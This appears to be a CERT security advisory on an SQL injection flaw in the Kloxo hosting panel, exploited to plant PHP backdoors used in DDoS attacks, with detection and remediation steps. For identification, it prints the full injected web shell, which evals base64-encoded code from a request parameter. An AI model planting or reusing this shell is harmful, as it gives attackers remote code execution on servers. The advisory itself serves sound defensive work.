Skip to main content

Kloxo SQL Injection Vulnerability

Last Update Date: 24 Feb 2014 18:24 Release Date: 24 Feb 2014 3514 Views

RISK: High Risk

TYPE: Servers - Other Servers

TYPE: Other Servers

A vulnerability has been identified in Kloxo, which can be exploited by malicious people to take full control of the server, and remotely execute arbitrary code.

 

According to forum vpsBoard (https://vpsboard.com/topic/3384-kloxo-installations-compromised/), an SQL injection vulnerability in Kloxo is exploited to inject malicious code into a random PHP file under /home/kloxo/httpd/default. Upon successful injection, the malicious code can decode and run any code passed as parameter.

 

The vulnerability was wildly exploited in DDoS attack against banks in US. HKCERT has received reports that servers in Hong Kong were compromised and used in the attack.

 

Exploit code on the vulnerability is publicly available.


Impact

  • Remote Code Execution

System / Technologies affected

  • Kloxo versions prior to 6.1.13

Solutions

How to verify server was compromised:

  • Under /home/kloxo/httpd/default, search any file which was injected with the following code:
    <?php
    set_time_limit(0);error_reporting(NULL);
    if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
    else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
    ?>

    If there is any, recover the original file from your backup or update Kloxo.
  • Search any of the following files that exist in your server:
    conzx.php fakzx.php indzx.php resuzx.php modzx.php genezx.php
    Please remove these files if there are any since they are used to launch DDoS attack.

 

Before installation of the software, please visit the software manufacturer web-site for more details.

 

If you cannot apply the update, please consider the following workaround:

  • Do not use the default admin ports (7777 and 7778).
  • Use alternative hosting control panel applications.

Vulnerability Identifier

  • No CVE information is available

Source


Related Link